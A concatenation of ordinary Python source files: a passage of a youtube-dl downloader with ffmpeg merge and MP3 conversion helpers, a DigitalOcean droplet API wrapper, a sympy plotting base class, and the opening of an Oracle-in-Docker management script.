'event': 'download_error',
'error': error,
}
debug('downloader error!')
if self._callback:
self._callback(msg)
def dash_merge_WEBM(self):
try:
from youtube_dl.postprocessor import FFmpegMergerPP
merger = FFmpegMergerPP(self._ydl)
info_dict = {}
for item in self._infos['downloadingFiles'].keys():
if re.search(r'opus|vorbis|m4a', item):
audio = item
else:
video = item
dest_filename = '%s\youtube_meger%s' % (os.path.dirname(video), os.path.splitext(video)[1])
info_dict['__files_to_merge'] = [video, audio]
info_dict['filepath'] = dest_filename
merger.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'dash_merge_WEBM', 'success', '')
except Exception as e:
self._GA.send('event', 'dash_merge_WEBM', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def multi_video_concat(self):
try:
concater = FFmpegConcatMultiVideo(self._ydl, self._infos['quality'])
info_dict = {}
# 源文件
dt = sorted(self._infos['downloadingFiles'].iteritems(), key=lambda item:item[1]['order'])
src_files = [item[0] for item in dt]
info_dict['__files_to_concat'] = src_files
# 目标文件
dest_filename = '%s\youtube_concat%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
concater.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'multi_video_merge', 'success', '')
except Exception as e:
self._GA.send('event', 'multi_video_merge', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def convert_to_mp3(self):
try:
converter = FFmpegExtractMp3(self._ydl, preferredquality=self._infos['quality'])
info_dict = {}
# 源文件
info_dict['filepath'] = self._infos['downloadingFiles'].keys()[0]
# 目标文件
dest_filename = '%s\youtube_audio%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
info_dict['filetime'] = self._infos.get('last-modified', None)
converter.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'convert_to_mp3', 'success', '')
except Exception as e:
self._GA.send('event', 'convert_to_mp3', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def fixup_m3u8(self):
try:
converter = FFmpegFixupM3u8PPForToggle(self._ydl)
info_dict = {}
# 源文件
info_dict['filepath'] = self._infos['downloadingFiles'].keys()[0]
# 目标文件
dest_filename = '%s\m3u8_fix%s' % (self._downloadtempPath, os.path.splitext(self._infos['destFileName'])[1])
info_dict['destpath'] = dest_filename
converter.run(info_dict)
self.move_to_dest(dest_filename)
self._GA.send('event', 'fixup_m3u8', 'success', '')
except Exception as e:
self._GA.send('event', 'fixup_m3u8', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def get_mediainfo(self, msg):
filename = msg['destFile']
if not os.path.exists(filename):
return
try:
ffpp = FFmpegPostProcessor(downloader=self._ydl)
args = [ffpp.executable]
args += ['-i', filename]
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=get_startinfo())
stdout, stderr = p.communicate()
# 获取成功
if p.returncode != 0:
stderr = stderr.decode('utf-8', 'replace')
# 时长
m = re.search(r'Duration\:\s*((?:\d\d[.:]){3}\d\d)', stderr)
if m:
duration = m.group(1)
h, m, s = duration.strip().split(':')
msg['duration'] = int(h) * 3600 + int(m) * 60 + float(s)
# 分辨率
m = re.search(r'\d{2,}x\d{2,}', stderr)
if m:
msg['resolution'] = m.group()
# 缩略图
thumb = msg.get('thumbnail', '')
if thumb != '' and not os.path.exists(thumb):
msg['thumbnail'] = thumb
start_pos = random.uniform(5, 20)
if msg.get('duration', 0) < start_pos:
start_pos = 0;
start_pos = str(start_pos);
try:
args = [ffpp.executable]
args += ['-ss', start_pos]
args += ['-i', filename]
args += ['-f', 'image2']
args += ['-y', thumb]
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, startupinfo=get_startinfo())
p.communicate()
except:
msg.pop('thumbnail')
self._GA.send('event', 'get_mediainfo', 'success', '')
except Exception as e:
self._GA.send('event', 'get_mediainfo', 'fail', traceback.format_exc())
debug(traceback.format_exc())
def delete_tempfiles(self):
if 'downloadingFiles' in self._infos:
for item in self._infos['downloadingFiles'].keys():
try:
os.remove(item)
tempfile = '%s.part' % item
if os.path.exists(tempfile):
os.remove(tempfile)
except:
pass
def cancel(self):
self._cancel = True
msg = {
'event': 'download_cancel',
'quality': self._infos.get('quality'),
'data': self._infos
}
if self._callback:
self._callback(msg)
# mp3转换、多段合并。独立抽出来,以避免修改ffmpeg这个文件
import time
import tempfile
import random
import subprocess
if sys.platform == 'win32':
import win_subprocess
from youtube_dl.postprocessor import FFmpegPostProcessor
from youtube_dl.postprocessor.ffmpeg import (
FFmpegPostProcessorError,
get_startinfo,
FFmpegFixupM3u8PP
)
from youtube_dl.postprocessor.common import AudioConversionError
from youtube_dl.utils import (
PostProcessingError,
)
from youtube_dl.utilsEX import debug
# 多段合并...ffmpeg在这里不识路径中[【双语・纪实72小时】黄金炸串店_20170303【秋秋】]这样的字符,而[一面湖水]这样的可识,劳动下临时目录,曲线救下国吧!
class FFmpegConcatMultiVideo(FFmpegPostProcessor):
def __init__(self, downloader=None, quality=0):
self._quality = quality
FFmpegPostProcessor.__init__(self, downloader)
def run(self, information):
destpath = information['destpath']
if os.path.exists(destpath):
os.remove(destpath)
input_paths = information['__files_to_concat']
oldest_mtime = min(os.stat(path).st_mtime for path in input_paths)
# 构建文件列表文件
input_txtfile = os.path.join(tempfile.gettempdir(), 'input_list.txt')
if os.path.exists(input_txtfile):
os.remove(input_txtfile)
inputf = open(input_txtfile, 'w')
for i, file in enumerate(input_paths):
line = 'file \'%s\'' % file
if i < len(input_paths) - 1:
line += '\n'
inputf.writelines(line)
inputf.close()
# 构建参数
args = [self.executable]
args += ['-f', 'concat']
#Unsafe file name '/tmp/temp/Watch Naruto Shippuden Season 17
args += ['-safe', '-1']
args += ['-i', input_txtfile]
args += ['-c', 'copy']
# 置同一磁盘中,rename会很快,如同盘剪切...若是mp3,则需要再转换
filename, ext = os.path.splitext(destpath)
is_audio = True if 'mp3' in ext.lower() else False
if is_audio:
ext = '.mp4'
# 若是音频,则置为mp4然后再转
destpath_new = filename + ext
args += [destpath_new]
try:
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=get_startinfo())
stdout, stderr = p.communicate()
if p.returncode != 0:
stderr = stderr.decode('utf-8', 'replace')
msg = stderr.strip().split('\n')[-1]
raise FFmpegPostProcessorError(msg)
# 若是mp3,需要再次转换
if is_audio:
converter = FFmpegExtractMp3(self._downloader, preferredquality=self._quality)
info_dict = {}
# 源文件
info_dict['filepath'] = destpath_new
# 目标文件
info_dict['destpath'] = destpath
converter.run(info_dict)
os.remove(destpath_new)
self.try_utime(destpath, oldest_mtime, oldest_mtime)
except Exception as ex:
debug('multi_video_concat error:')
debug(ex)
if is_audio:
os.remove(destpath_new)
raise ex
finally:
os.remove(input_txtfile)
# 抽取mp3
class FFmpegExtractMp3(FFmpegPostProcessor):
def __init__(self, downloader=None, preferredquality='320'):
FFmpegPostProcessor.__init__(self, downloader)
self._preferredquality = preferredquality
def run_ffmpeg(self, path, out_path, codec, more_opts):
if codec is None:
acodec_opts = []
else:
acodec_opts = ['-acodec', codec]
opts = ['-vn'] + acodec_opts + more_opts
try:
FFmpegPostProcessor.run_ffmpeg(self, path, out_path, opts)
except FFmpegPostProcessorError as err:
raise AudioConversionError(err.msg)
def run(self, information):
src_path = information['filepath']
acodec = 'libmp3lame'
extension = 'mp3'
more_opts = []
if self._preferredquality is not None:
if int(self._preferredquality) < 10:
more_opts += ['-q:a', self._preferredquality]
else:
more_opts += ['-b:a', self._preferredquality + 'k']
dst_path = information['destpath']
information['ext'] = extension
# If we download foo.mp3 and convert it to... foo.mp3, then don't delete foo.mp3, silly.
if dst_path == src_path:
if self._downloader:
self._downloader.to_screen('[ffmpeg] Post-process file %s exists, skipping' % dst_path)
return
try:
if self._downloader:
self._downloader.to_screen('[ffmpeg] Destination: ' + dst_path)
self.run_ffmpeg(src_path, dst_path, acodec, more_opts)
except AudioConversionError as e:
raise PostProcessingError(
'audio conversion failed: ' + e.msg)
except Exception as ex:
raise PostProcessingError('error running ' + self.basename)
# Try to update the date time for extracted audio file.
if information.get('filetime') is not None:
self.try_utime(
dst_path, time.time(), information['filetime'],
errnote='Cannot update utime of audio file')
class FFmpegFixupM3u8PPForToggle(FFmpegFixupM3u8PP):
def get_audio_codec(self, path):
return 'aac'
def run(self, info):
filename = info['filepath']
if self.get_audio_codec(filename) == 'aac':
destpath = info['destpath']
options = ['-c', 'copy', '-f', 'mp4', '-bsf:a', 'aac_adtstoasc']
self._downloader.to_screen('[ffmpeg] Fixing malformed AAC bitstream in "%s"' % filename)
self.run_ffmpeg(filename, destpath, options)
os.remove(filename)
return [], info
|
droplets.py
|
from .digitaloceanapiconnection import DigitalOceanAPIConnection
import os
import time
import queue
import threading
import datetime
import random
import json
class Droplets(DigitalOceanAPIConnection):
"""[summary]
Args:
DigitalOceanAPIConnection ([type]): [description]
API Returns Droplet Attributes:
id(int): A unique identifier for each Droplet instance. This is automatically generated upon Droplet creation.
name(str): The human-readable name set for the Droplet instance.
memory(int): Memory of the Droplet in megabytes.
vcpus(int): The number of virtual CPUs.
disk(int): The size of the Droplet's disk in gigabytes.
locked(bool): A boolean value indicating whether the Droplet has been locked, preventing actions by users.
created_at(str): A time value given in ISO8601 combined date and time format that represents when the Droplet was created.
status(str): A status string indicating the state of the Droplet instance. This may be "new", "active", "off", or "archive".
backup_ids([]): An array of backup IDs of any backups that have been taken of the Droplet instance. Droplet backups are enabled at the time of the instance creation.
snapshot_ids([]): An array of snapshot IDs of any snapshots created from the Droplet instance.
features([]): An array of features enabled on this Droplet.
region(obj): The region that the Droplet instance is deployed in. When setting a region, the value should be the slug identifier for the region. When you query a Droplet, the entire region object will be returned.
image(obj): The base image used to create the Droplet instance. When setting an image, the value is set to the image id or slug. When querying the Droplet, the entire image object will be returned.
size(obj): The current size object describing the Droplet. When setting a size, the value is set to the size slug. When querying the Droplet, the entire size object will be returned. Note that the disk volume of a Droplet may not match the size's disk due to Droplet resize actions. The disk attribute on the Droplet should always be referenced.
size_slug(str): The unique slug identifier for the size of this Droplet.
networks(obj): The details of the network that are configured for the Droplet instance. This is an object that contains keys for IPv4 and IPv6. The value of each of these is an array that contains objects describing an individual IP resource allocated to the Droplet. These will define attributes like the IP address, netmask, and gateway of the specific network depending on the type of network it is.
kernel(obj): Nullable object The current kernel. This will initially be set to the kernel of the base image when the Droplet is created.
next_backup_window(obj) Nullable object The details of the Droplet's backups feature, if backups are configured for the Droplet. This object contains keys for the start and end times of the window during which the backup will start.
tags([]): An array of Tags the Droplet has been tagged with.
volume_ids([]): A flat array including the unique identifier for each Block Storage volume attached to the Droplet.
vpc_uuid([]): A string specifying the UUID of the VPC to which the Droplet is assigned.
"""
def __init__(self):
DigitalOceanAPIConnection.__init__(self)
self.endpoint = "/v2/droplets"
def list_all_droplets(self, page=0, per_page=0):
"""[summary]
Returns:
[type]: [description]
API Expects:
page(int) which page to return
per_page(int) how many results per page
API Returns:
A list of droplets objects, with standard droplet attributes.
"""
arguments = locals()
del arguments["self"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def list_all_droplets_by_tag(self, tag_name, page=0, per_page=0):
arguments = locals()
del arguments["self"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def create_new_droplet(
self,
name,
region,
size,
image,
ssh_keys=[],
backups=None,
ipv6=None,
private_networking=None,
vpc_uuid=None,
user_data=None,
monitoring=None,
volumes=[],
tags=[],
):
"""[summary]
Returns:
[type]: [description]
API Expects:
name(str): REQUIRED. The human-readable string you wish to use when displaying the Droplet name. The name, if set to a domain name managed in the DigitalOcean DNS management system, will configure a PTR record for the Droplet. The name set during creation will also determine the hostname for the Droplet in its internal configuration.
region(str): REQUIRED. The unique slug identifier for the region that you wish to deploy in.
size(str): REQUIRED. The unique slug identifier for the size that you wish to select for this Droplet.
image(int,str): REQUIRED. integer (if using an image ID), or String (if using a public image slug) The image ID of a public or private image, or the unique slug identifier for a public image. This image will be the base image for your Droplet.
ssh_keys([]): An array containing the IDs or fingerprints of the SSH keys that you wish to embed in the Droplet's root account upon creation.
backups(bool): A boolean indicating whether automated backups should be enabled for the Droplet. Automated backups can only be enabled when the Droplet is created.
ipv6(bool): A boolean indicating whether IPv6 is enabled on the Droplet.
private_networking(bool): This parameter has been deprecated. Use 'vpc_uuid' instead to specify a VPC network for the Droplet. If no `vpc_uuid` is provided, the Droplet will be placed in the default VPC.
vpc_uuid(str): A string specifying the UUID of the VPC to which the Droplet will be assigned. If excluded, beginning on April 7th, 2020, the Droplet will be assigned to your account's default VPC for the region.
user_data(str): A string containing 'user data' which may be used to configure the Droplet on first boot, often a 'cloud-config' file or Bash script. It must be plain text and may not exceed 64 KiB in size.
monitoring(bool): A boolean indicating whether to install the DigitalOcean agent for monitoring.
volumes([]): A flat array including the unique string identifier for each block storage volume to be attached to the Droplet. At the moment a volume can only be attached to a single Droplet.
tags([]) A flat array of tag names as strings to apply to the Droplet after it is created. Tag names can either be existing or new tags.
API Returns:
A droplets object, with standard droplet attributes.
API data example:
data = '{"name":"example.com","region":"nyc3","size":"s-1vcpu-1gb","image":"ubuntu-16-04-x64","ssh_keys":[107149],"backups":false,"ipv6":true,"user_data":null,"private_networking":null,"volumes": null,"tags":["web"]}'
"""
arguments = locals()
del arguments["self"]
data = json.dumps(arguments)
return self.post_request(self.endpoint, headers=self.headers, data=data)
def delete_droplet_id(self, id):
"""
To delete a Droplet, send a DELETE request to /v2/droplets/$DROPLET_ID
"""
return self.delete_request(f"{self.endpoint}/{id}", headers=self.headers)
def delete_droplet_tag(self, tag_name):
"""
To delete Droplets by a tag (for example awesome), send a DELETE request to /v2/droplets?tag_name=$TAG_NAME.
"""
return self.delete_request(
f"{self.endpoint}?tag_name={tag_name}", headers=self.headers
)
def retrieve_droplet_by_id(self, id):
"""[summary]
Args:
id ([type]): [description]
To show information about an individual Droplet, send a GET request to /v2/droplets/$DROPLET_ID.
"""
return self.get_request(f"{self.endpoint}/{id}", headers=self.headers)
def retrieve_droplet_action(self, droplet_id, action_id):
"""
Args:
droplet_id ([type]): [description]
action_id ([type]): [description]
"""
return self.get_request(
f"{self.endpoint}/{droplet_id}/actions/{action_id}", headers=self.headers
)
def reboot_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "reboot"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def shutdown_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "shutdown"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def poweron_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_on"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def poweroff_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_off"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def powercycle_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_cycle"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def rebuild_droplet(self, id, image):
"""
Rebuld action functions just like a new create.
Args:
id ([type]): Droplet ID
image ([type]): Image slug or ID.
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "rebuild"
data_dict["image"] = image
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def rename_droplet(self, id, name):
print("rename api called")
"""
Rebuld action functions just like a new create.
Args:
id ([type]): Droplet ID
name ([type]): New droplet name
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "rename"
data_dict["name"] = name
data = json.dumps(data_dict)
endpoint = f"{self.endpoint}/{id}/actions"
print(endpoint)
print(data)
return self.post_request(endpoint, headers=self.headers, data=data)
print("api finished")
def create_snapshot_from_droplet(self, id, name):
data_dict = {}
data_dict["type"] = "snapshot"
data_dict["name"] = name
# api doesnt let you have tags for droplets at this point
# data_dict["tags"] = tags
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def list_snapshots_for_droplet(self, id, page=0, per_page=0):
arguments = locals()
del arguments["self"]
del arguments["id"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(
f"{self.endpoint}/{id}/snapshots", headers=self.headers, params=params
)
def restore_droplet(self, droplet_id, image_id):
data_dict = {}
data_dict["type"] = "restore"
data_dict["image"] = image_id
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{droplet_id}/actions", headers=self.headers, data=data
)
def resize_droplet(self, droplet_id, size, disk_resize=False):
##WARNING... if you try to resie to a lower size disk api will hang.
##need to implement checking if resize is allowed.
"""[summary]
Args:
droplet_id ([type]): [description]
size ([type]): [description]
disk_resize (bool, optional): When set to True you resize not only the memory, but also you upgrade to the disk size of the slug, meaning you cant resize back down. Defaults to False.
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "resize"
if disk_resize:
data_dict["disk"] = True
data_dict["size"] = size
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{droplet_id}/actions", headers=self.headers, data=data
)
def list_droplet_resources(self, droplet_id):
return self.get_request(
f"{self.endpoint}/{droplet_id}/destroy_with_associated_resources",
headers=self.headers,
)
if __name__ == "__main__":
digitalocean_droplets = Droplets()
# def make_a_call_to_digitalocea_to_list_all_droplets(x):
# response = digitalocean_droplets.list_all_droplets()
# print(x, datetime.datetime.now())
# for x in range(0, 20):
# threading.Thread(
# target=make_a_call_to_digitalocea_to_list_all_droplets, args=(x,)
# ).start()
response = digitalocean_droplets.create_new_droplet(
name="example.com",
region="nyc3",
size="s-1vcpu-1gb",
image="ubuntu-16-04-x64",
ssh_keys=[],
backups=False,
ipv6=True,
user_data=None,
private_networking=None,
volumes=None,
tags=["banabas"],
)
# response = digitalocean_droplets.delete_droplet_id(249612802)
# response = digitalocean_droplets.list_all_droplets(page=1, per_page=2)
content = response.content.decode("utf-8")
droplet_data = dict(json.loads(content)["droplet"])
print(droplet_data)
|
plot_mode_base.py
|
from __future__ import print_function, division
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core import S
from sympy.core.compatibility import is_sequence
from time import sleep
import warnings
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe': 1, 'solid': 2, 'both': 3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85, 0.85, 0.85)
default_solid_color = (0.6, 0.6, 0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except:
warnings.warn("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self.cbounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f):
f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f):
f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.isSet():
return
self._calculating_verts.set()
try:
self._on_calculate_verts()
finally:
self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.isSet():
return
while self._calculating_cverts.isSet():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try:
self._on_calculate_cverts()
finally:
self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.isSet()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.isSet()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None:
return
if v == '':
step_max = 0
for i in self.intervals:
if i.v_steps is None:
continue
step_max = max([step_max, int(i.v_steps)])
v = ['both', 'solid'][step_max > 40]
#try:
if v not in self.styles:
raise ValueError("v should be there in self.styles")
if v == self._style:
return
self._style = v
#except Exception as e:
#raise RuntimeError(("Style change failed. "
# "Reason: %s is not a valid "
# "style. Use one of %s.") %
# (str(v), ', '.join(self.styles.iterkeys())))
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if is_sequence(v):
v = ColorScheme(*v)
else:
v = ColorScheme(v)
if repr(v) == repr(self._color):
return
self._on_change_color(v)
self._color = v
except Exception as e:
raise RuntimeError(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [('mode', self.primary_alias),
('color', str(self.color)),
('style', str(self.style))]
o = "'%s'" % (("; ".join("%s=%s" % (k, v)
for k, v in d if v != 'None')))
return ", ".join([f, i, o])
|
oradock.py
|
#!/usr/bin/env python
"""
Oradock project is an Oracle Database 11g manager system integrated with Docker, where you can easily start a database from the scratch or download & recover a backup from s3 (aws).
For more information, please visit https://github.com/rafaelmariotti/oradock
Usage:
oradock.py (restore | restart) DATABASE MEMORY SERVICE_NAME [options]
oradock.py create database DATABASE PASSWORD MEMORY SERVICE_NAME [options]
oradock.py create image IMAGE_NAME PASSWORD [options]
oradock.py (-h | --help)
oradock.py --version
Operations:
restore
Restore and recovery database backup files.
restart
Restart and configure a container that already has datafiles restored.
create database
Create a new empty database.
create image
Create an Oracle image.
Arguments:
DATABASE
Database(s) target name to work, separate by comma.
MEMORY
Memory percent to reserve for each database, separate by comma.
PASSWORD
Single password to set oracle and sys users.
SERVICE_NAME
Main service name for each database, separate by comma.
IMAGE_NAME
Image name to build.
Options:
-k ORADOCK_HOME, --oradock-home=ORADOCK_HOME
Directory where oradock binary are located [default: /opt/oradock].
-l LOG_LEVEL, --log-level=LOG_LEVEL
Log level to set [default: info].
Create image options:
-o OINSTALL_DIR, --oinstall-dir=OINSTALL_DIR
Directory with Oracle binary files to install [default: $ORADOCK_HOME/conf/dockerfile/config_files/database].
-d DOCKERFILE, --dockerfile-template=DOCKERFILE
Dockerfile template to build Oracle docker image [default: $ORADOCK_HOME/conf/dockerfile/Dockerfile.template].
Restore options:
-b BACKUP_DIR, --backup-directory=BACKUP_DIR
Directory home path for each backup location, separated by comma [default: /backup/$DATABASE].
-c CFILE_NAME, --control-file-name=CFILE_NAME
Controlfile name to search among backup files to restore [default: controlfile.bkp].
-s SPFILE_NAME, --spfile-name=SPFILE_NAME
Spfile name to search among backup files to restore [default: spfile.bkp].
-A ACCESS_KEY, --s3-access-key=ACCESS_KEY
Access key to download from s3 bucket.
-B S3_BUCKET, --s3-bucket=S3_BUCKET
s3 bucket directory to download the backup files.
-S SECRET_KEY, --s3-secret-key=SECRET_KEY
Secret key to download from s3 bucket.
-P PARALLEL, --parallel=PARALLEL
Set the parallel level to restore backups [default: 1].
Restore, restart & create database options:
-D DATAFILE_DIR, --datafile-dir=DATAFILE_DIR
Base directory where datafiles will be stored and separated by directories [default: /data].
-i IMAGE_NAME, --image-name=IMAGE_NAME
Set which Docker image oradock has to use [default: rafaelmariotti/oracle-ee-11g:latest].
-p PORT, --port=PORT
Database port which container will use [default: 1521].
-C CONTAINER_NAME, --container-name=CONTAINER_NAME
Set the container name to create [default: oradock-db-$DATABASE].
-F, --force-pull
Forces a docker pull to update the image that oradock is using.
General options:
-h, --help
Show help menu.
Funny options:
--animation=ANIMATION_NUMBER
Choose your own animation while creating Oracle docker image, between 1 and 2 [default: 1].
"""
__author__ = 'Rafael dos Santos Mariotti <rafael.s.mariotti@gmail.com>'
__version__ = 'oradock v1.0'
try:
import logging
import collections
import sys
import os
import re
import errno
import time
import socket
import boto.exception
from multiprocessing import Process, Manager
from docopt import docopt
from shutil import copyfile
from shutil import copytree
from shutil import rmtree
from shutil import chown
from boto.s3.connection import S3Connection
from docker import Client
from docker import errors as docker_error
except ImportError as error: #check for all modules
print('ERROR: Could not find module \'%s\'' % error.name)
sys.exit(-1)
def set_log(log_level): #set log level to print
log_level_number = getattr(logging, log_level.upper(), None)
if not isinstance(log_level_number, int):
print('ERROR: Invalid log level \'%s\'' % log_level.upper())
sys.exit(-1)
logging.basicConfig(level=log_level.upper(), format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
